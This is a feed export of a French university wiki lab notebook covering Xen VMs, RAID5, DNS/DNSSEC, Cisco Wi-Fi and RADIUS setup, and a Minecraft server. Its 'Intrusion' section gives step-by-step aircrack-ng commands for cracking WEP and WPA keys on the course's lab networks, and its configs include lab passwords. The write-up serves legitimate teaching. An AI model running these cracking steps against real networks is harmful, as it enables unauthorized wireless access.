Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60277</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60277"/>
				<updated>2022-11-29T00:01:09Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Vérifier son DNS avec dnsviz */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
[[Fichier:RAID5.png]]&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
===DNS===&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.48&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  193.48.57.0/24;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===DNSSEC===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes;&lt;br /&gt;
dnssec-validation yes;&lt;br /&gt;
dnssec-lookaside auto;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Création du répertoire &amp;lt;code&amp;gt;detestable.site.dnssec&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;mkdir /etc/bind/detestable.site.dnssec/&lt;br /&gt;
cd /etc/bind/detestable.site.dnssec/&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Génération de la clef asymétrique de signature de clefs de zone :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA256 -b 2048 -f KSK -n ZONE detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mv Kdetestable.site.*.key detestable.site-ksk.key&lt;br /&gt;
mv Kdetestable.site.*.private detestable.site-ksk.private&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Génération de la clef asymétrique de signature des enregistrements :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA256 -b 2048 -n ZONE detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mv Kdetestable.site.*.key detestable.site-zsk.key&lt;br /&gt;
mv Kdetestable.site.*.private detestable.site-zsk.private&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;$include &amp;amp;quot;/etc/bind/detestable.site.dnssec/detestable.site-ksk.key&amp;amp;quot;&lt;br /&gt;
$include &amp;amp;quot;/etc/bind/detestable.site.dnssec/detestable.site-zsk.key&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Signature des enregistrements de la zone :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o detestable.site -k detestable.site-ksk ../db.detestable.site detestable.site-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;demineur.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site.signed&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK (présente dans le fichier &amp;lt;code&amp;gt;detestable.site-ksk.key&amp;lt;/code&amp;gt;) à Gandi.&amp;lt;br /&amp;gt;&lt;br /&gt;
L’algorithme utilisé est le 8 (RSA/SHA-256).&lt;br /&gt;
&lt;br /&gt;
=== Tester DNSSEC : ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cd /etc/bind/&lt;br /&gt;
dnssec-verify -o detestable.site db.detestable.site.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vérifier son DNS avec dnsviz ===&lt;br /&gt;
[[Fichier:dnsviz_detestable.png]]&lt;br /&gt;
&lt;br /&gt;
=Connexion wifi=&lt;br /&gt;
==Point d'accès wifi==&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
Mode terminal&lt;br /&gt;
 ap&amp;amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
Configuration du nom d’hôte :&lt;br /&gt;
 &amp;lt;pre&amp;gt;ap(config)#hostname SE2A5-AP1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Accès SSH :&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Accès console :&lt;br /&gt;
 SE2A5-AP1(config)#line console 0&lt;br /&gt;
 SE2A5-AP1(config-line)#password glopglop&lt;br /&gt;
 SE2A5-AP1(config-line)#login authentification default&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Sécurisation des accès :&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
VLAN n°20&lt;br /&gt;
 &amp;lt;SE2A5-AP1(config)#aaa authentication login EAP_toto group RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config)#radius-server host 193.48.57.163 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 SE2A5-AP1(config)#aaa group server radius RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config-server)#server 193.48.57.163 auth-port 1812 acct-port 1813&lt;br /&gt;
 SE2A5-AP1(config-server)#exit&lt;br /&gt;
 SE2A5-AP1(config)#dot11 ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-ssid)#vlan 20&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication open eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication network-eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication key-management wpa&lt;br /&gt;
 SE2A5-AP1(config-ssid)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface g0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio 0&lt;br /&gt;
 SE2A5-AP2(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#encryption vlan 20 mode ciphers aes-ccm tkip&lt;br /&gt;
 SE2A5-AP1(config-if)#mbssid&lt;br /&gt;
 SE2A5-AP1(config-if)#ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyACM0&lt;br /&gt;
VLAN n°1 :&lt;br /&gt;
 SE2A5-AP1(config)#interface BVI 1&lt;br /&gt;
 SE2A5-AP1(config-if)#ip address 10.0.0.10 255.255.255.0&lt;br /&gt;
 SE2A5-AP1(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 SE2A5-AP1(config)#ip default-gateway 10.0.0.1&lt;br /&gt;
&lt;br /&gt;
== Configuration du serveur RADIUS ==&lt;br /&gt;
&lt;br /&gt;
Le serveur RADIUS permet l’authentification des utilisateurs qui se connectent aux points d’accès Wifi (WPA-EAP).&lt;br /&gt;
&lt;br /&gt;
* Installer le paquet &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install freeradius&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;client SE2A51 {&lt;br /&gt;
        ipaddr  = 10.0.0.10&lt;br /&gt;
        secret  = glopglop&lt;br /&gt;
}&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajouter un utilisateur en modifiant le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;pifou Cleartext-Password := &amp;amp;quot;pasglop&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enables/eap&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;eap {&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
  ...&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Arrêter le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; durant la phase de tests :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius stop&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Démarrer &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; en mode debug :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;freeradius -X&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pendant que &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; est en mode debug, tenter de se connecter au réseau Wifi qui a été créé et vérifier que celle-ci est prise en compte.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:freeradius_X.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut également voir la connexion de l'appareil sur minicom&lt;br /&gt;
&lt;br /&gt;
[[Fichier:connexion_minicom.png]]&lt;br /&gt;
&lt;br /&gt;
Si la connexion est validée alors la configuration est correcte. Dans ce cas, arrêter le programme de debug et réactiver le service.&lt;br /&gt;
&lt;br /&gt;
* Redémarrer le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Dnsviz_detestable.png&amp;diff=60276</id>
		<title>Fichier:Dnsviz detestable.png</title>
